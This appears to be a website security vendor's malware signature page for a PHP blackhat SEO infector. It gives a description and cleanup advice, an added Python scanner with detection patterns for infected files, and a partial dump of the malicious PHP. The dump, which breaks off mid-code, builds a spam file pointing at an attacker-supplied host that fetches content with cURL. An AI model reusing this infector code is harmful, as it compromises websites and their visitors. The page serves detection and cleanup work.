Malware Signatures

php.spam-seo.infector.001.002

Blackhat SEO is a malicious technique used to manipulate search engine results in order to boost a website's apparent relevance. The payload is PHP based, so it is intended for server-side use and is executed directly on the server while the site is loaded. Only the result of the payload (such as a malicious iframe or a redirect) is visible in the browser, not the malicious code itself.
This is the code responsible for injecting the conditional spam algorithm into the site's PHP files. It allows the attacker to insert, remove, or even change the spam campaign that a website will be part of.
It has functions to autodetect popular CMSs and infect them accordingly.

Affecting

Any vulnerable website. Outdated software or compromised passwords can act as an infection vector.

Cleanup

Cleanup is done by deleting the malicious code from the infected file or by replacing the file with a fresh version. The infection can be found on your system by searching your site's files for cURL requests.
You can also sign up with us and let our team remove the malware for you.
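
The search described above, as an added example (not code from this signature's author): a scanner that walks a web root, flags PHP files that call cURL, and raises the verdict when a file also contains strings visible in the dump below ($dor_dir, get_content2, the User-Agent passthrough, the split PHP open tag). The function names, verdict labels and sample strings are assumptions made for this example.

```python
import re
import sys
from pathlib import Path

# Generic cURL use (the cleanup hint above) plus strings visible in the dump.
INDICATORS = {
    "curl_call": re.compile(r"\bcurl_(?:init|exec|setopt)\s*\("),
    "dor_dir_var": re.compile(r"\$dor_dir\b"),
    "get_content2": re.compile(r"function\s+get_content2\s*\("),
    "ua_passthrough": re.compile(
        r"CURLOPT_USERAGENT\s*,\s*\$_SERVER\s*\[\s*[\"']HTTP_USER_AGENT[\"']\s*\]"),
    "split_open_tag": re.compile(r"'<'\s*\.\s*'\?'\s*\.\s*'php"),
}
PHP_SUFFIXES = {".php", ".phtml", ".inc"}

def scan_text(text):
    """Return the sorted names of the indicators found in one file's contents."""
    return sorted(name for name, rx in INDICATORS.items() if rx.search(text))

def triage(hits):
    """cURL alone is common in legitimate code, so it only earns a manual review."""
    if not hits:
        return "clean"
    return "review" if hits == ["curl_call"] else "likely"

def scan_tree(root):
    """Map relative path -> (verdict, hits) for every PHP file under root with a hit."""
    findings = {}
    for path in Path(root).rglob("*"):
        if path.is_file() and path.suffix.lower() in PHP_SUFFIXES:
            hits = scan_text(path.read_text(encoding="utf-8", errors="replace"))
            if hits:
                findings[str(path.relative_to(root))] = (triage(hits), hits)
    return findings

# Constructed samples for testing the patterns (not taken from a real site).
SAMPLE_INFECTED = ('<?php $dor_dir = "http://example.invalid/"; '
                   'function get_content2($URL){$ch=curl_init();'
                   'curl_setopt($ch,CURLOPT_USERAGENT,$_SERVER["HTTP_USER_AGENT"]);'
                   'return curl_exec($ch);}')
SAMPLE_LEGIT = '<?php $ch = curl_init("https://api.example.invalid/"); curl_exec($ch);'

if __name__ == "__main__":
    root = sys.argv[1] if len(sys.argv) > 1 else "."
    for rel, (verdict, hits) in sorted(scan_tree(root).items()):
        print(f"{verdict:7} {rel}  {','.join(hits)}")
```

Files marked "review" use cURL without any of the dump's strings and need a manual look; compare them against a fresh copy of the CMS or plugin before deleting anything.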

Dump


if ($req == "addd") {

echo "Try to add dor..." . "\n";

$durl = $_GET['c'];
$durl = str_replace("\\", "", $durl);

$dkey = "xxx";
$dkey = $_GET['k'];
$dkey = str_replace("\\", "", $dkey);

$dfile = "link.php";
$dir = "../../..";

$cont = '<' . '?' . 'php $dor_dir = "' . $durl . '";' ;

$cont .= 'function get_content2($URL){$ch=curl_init();curl_setopt($ch,CURLOPT_URL,$URL);curl_setopt($ch,CURLOPT_HEADER,0);curl_setopt($ch,CURLOPT_FOLLOWLOCATION,0);curl_setopt($ch,CURLOPT_RETURNTRANSFER,TRUE);curl_setopt($ch,CURLOPT_USERAGENT,$_SERVER["HTTP_USER_AGENT"]);$result=curl_exec($ch);curl_close($ch);return $result;}';

/*